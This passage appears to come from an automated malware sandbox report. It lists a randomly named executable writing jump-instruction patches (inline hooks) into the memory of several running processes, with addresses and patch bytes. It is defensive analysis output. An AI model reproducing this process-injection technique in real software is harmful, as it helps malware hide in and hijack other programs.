            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 75709AE0 value: E9 8B 8A C4 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 756F5366 value: E9 55 BE C5 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 756F3EFC value: E9 8F D3 C5 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 69CBA9B0 value: E9 3B 6D 69 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 69CA572C value: E9 AF C0 6A 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 769A6C19 value: E9 32 06 9B 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 769A4889 value: E9 82 D4 9A 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 76A91D20 value: E9 7B 03 8C 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 76A0BF10 value: E9 4B 62 94 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 76A81610 value: E9 8B 0D 8D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774D0078 value: E9 53 53 E8 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774EEB2A value: E9 D1 67 E6 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774CFA50 value: E9 3B 69 E4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774CFDA8 value: E9 93 68 E4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 757158CD value: E9 2E B7 BF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 757182ED value: E9 AE 8D BF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 7576DF21 value: E9 EA 45 BA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 75709AE0 value: E9 8B 8A C0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 756F5366 value: E9 55 BE C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 756F3EFC value: E9 8F D3 C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 69CBA9B0 value: E9 3B 6D 65 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 69CA572C value: E9 AF C0 66 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 769A6C19 value: E9 32 06 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 769A4889 value: E9 82 D4 96 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 76A91D20 value: E9 7B 03 88 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 76A0BF10 value: E9 4B 62 90 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 76A81610 value: E9 8B 0D 89 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774D0078 value: E9 53 53 E4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774EEB2A value: E9 D1 67 E2 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774CFA50 value: E9 3B 69 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774CFDA8 value: E9 93 68 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 757158CD value: E9 2E B7 C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 757182ED value: E9 AE 8D C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 7576DF21 value: E9 EA 45 C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 75709AE0 value: E9 8B 8A C7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 756F5366 value: E9 55 BE C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 756F3EFC value: E9 8F D3 C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 69CBA9B0 value: E9 3B 6D 6C 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 69CA572C value: E9 AF C0 6D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 769A6C19 value: E9 32 06 9E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 769A4889 value: E9 82 D4 9D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 76A91D20 value: E9 7B 03 8F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 76A0BF10 value: E9 4B 62 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 76A81610 value: E9 8B 0D 90 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774D0078 value: E9 53 53 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774EEB2A value: E9 D1 67 E9 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774CFA50 value: E9 3B 69 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774CFDA8 value: E9 93 68 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 757158CD value: E9 2E B7 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 757182ED value: E9 AE 8D 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 7576DF21 value: E9 EA 45 99 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 75709AE0 value: E9 8B 8A 9F 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 756F5366 value: E9 55 BE A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 756F3EFC value: E9 8F D3 A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 69CBA9B0 value: E9 3B 6D 44 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 69CA572C value: E9 AF C0 45 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 769A6C19 value: E9 32 06 76 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 769A4889 value: E9 82 D4 75 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 76A91D20 value: E9 7B 03 67 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 76A0BF10 value: E9 4B 62 6F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 76A81610 value: E9 8B 0D 68 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774D0078 value: E9 53 53 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774EEB2A value: E9 D1 67 C1 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774CFA50 value: E9 3B 69 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774CFDA8 value: E9 93 68 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 757158CD value: E9 2E B7 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 757182ED value: E9 AE 8D 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 7576DF21 value: E9 EA 45 99 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 75709AE0 value: E9 8B 8A 9F 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 756F5366 value: E9 55 BE A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 756F3EFC value: E9 8F D3 A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 69CBA9B0 value: E9 3B 6D 44 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 69CA572C value: E9 AF C0 45 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 769A6C19 value: E9 32 06 76 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 769A4889 value: E9 82 D4 75 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 76A91D20 value: E9 7B 03 67 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 76A0BF10 value: E9 4B 62 6F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 76A81610 value: E9 8B 0D 68 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774D0078 value: E9 53 53 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774EEB2A value: E9 D1 67 C1 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 774CFA50 value: E9 3B 69 D5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 774CFDA8 value: E9 93 68 D5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 757158CD value: E9 2E B7 B0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 757182ED value: E9 AE 8D B0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 7576DF21 value: E9 EA 45 AB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 75709AE0 value: E9 8B 8A B1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 756F5366 value: E9 55 BE B2 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 756F3EFC value: E9 8F D3 B2 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 69CBA9B0 value: E9 3B 6D 56 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 69CA572C value: E9 AF C0 57 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 769A6C19 value: E9 32 06 88 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 769A4889 value: E9 82 D4 87 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 76A91D20 value: E9 7B 03 79 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 816 base: 76A0BF10 value: E9 4B 62 81 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 816 base: 76A81610 value: E9 8B 0D 7A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 816 base: 774D0078 value: E9 53 53 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 816 base: 774EEB2A value: E9 D1 67 D3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 774CFA50 value: E9 3B 69 E5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 774CFDA8 value: E9 93 68 E5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 757158CD value: E9 2E B7 C0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 757182ED value: E9 AE 8D C0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 7576DF21 value: E9 EA 45 BB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 75709AE0 value: E9 8B 8A C1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 756F5366 value: E9 55 BE C2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 756F3EFC value: E9 8F D3 C2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 69CBA9B0 value: E9 3B 6D 66 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 69CA572C value: E9 AF C0 67 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 769A6C19 value: E9 32 06 98 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 769A4889 value: E9 82 D4 97 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 76A91D20 value: E9 7B 03 89 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 76A0BF10 value: E9 4B 62 91 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 76A81610 value: E9 8B 0D 8A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 774D0078 value: E9 53 53 E5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1012 base: 774EEB2A value: E9 D1 67 E3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 774CFA50 value: E9 3B 69 04 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 774CFDA8 value: E9 93 68 04 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 757158CD value: E9 2E B7 DF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 757182ED value: E9 AE 8D DF 8A
